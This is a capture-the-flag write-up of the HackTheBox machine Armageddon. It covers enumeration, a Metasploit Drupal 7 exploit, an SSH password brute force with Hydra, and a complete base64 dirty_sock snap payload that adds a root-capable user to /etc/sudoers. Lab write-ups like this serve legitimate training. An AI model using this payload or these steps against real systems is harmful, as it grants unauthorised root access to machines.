I just started to make notes for my machine/box completions for write-up publishing recently and I really started to enjoy doing it. The majority of the completed write-ups are still active machines. Which means I am unfortunately not allowed to upload the write-ups as of yet.
Welcome to my writeup for Armageddon.HTB.
First we start with some basic enumeration.
Nmap
sudo nmap -sC -sV -O -A 10.10.10.233 -v-sC: Scan with default NSE scripts. Considered useful for discovery and safe.-sV: Attempts to determine the version of the service running on port.-O: Remote OS detection using TCP/IP
stack fingerprinting.-A: Enables OS detection, version detection, script scanning, and traceroute-v: Increase the verbosity level (use -vv or more for greater effect)https://www.stationx.net/nmap-cheat-sheet/
Looking at the ports we see that ports 22 and 80 are open.
Port 22 we can use for SSH so let’s take a note of that.
Port 80 tells us there is a page so let us explore that.
As you can see below it is just a plain webpage with a log in feature.
Gobuster
I have a feeling we might get more loot if we brute force for directories.
Gobuster is perfect for that!
sudo gobuster dir -u http://10.10.10.233 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php-u: url
-w: wordlist
-x: file type
A lot of good hits, but on further inspection no info of value for our purpose.. The only info of worth we found was a version file of the cms that the website is running:
Metasploit
Let us try a Metasploit exploit, we are looking for Drupal 7.
search drupal 7
we will be using number: 1
use 1
Got stuck but then remembered the meterpreter commands. So I played with that and used it to upload LinPEAS.
meterpreter > upload linpeas.sh
Inside the info of LinPEAS, I got the username: bxxxxxxxxxxxxxxx
I ran that through hydra and got the password for the ssh.
Hydra
hydra -f -l bxxxxxxxxxxxxxxx -P /usr/share/wordlists/rockyou.txt 10.10.10.233 -t 4 ssh ─╯
I guess it is time to SSH in!
And we are in!
Userflag in the pocket!
Now when I run the sudo -l command I can use snap install..
Now we need to figure out what it is we install to escalate to root. Next on the attacker machine put in the command:
python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d > lol.snap
We got this piece of code from an exploit for an older version of snap. We just repurposed it for our needs on this version. Google: dirty_sock.
Now let’s install the lol.snap we just made.
sudo /usr/bin/snap install --devmode lol.snap
Now let’s log in into our new user with root priviledges!
su dirty_sock
WE ARE ROOT!
Get an email whenever n3pp13 publishes. https://n3pp13.medium.com/subscribe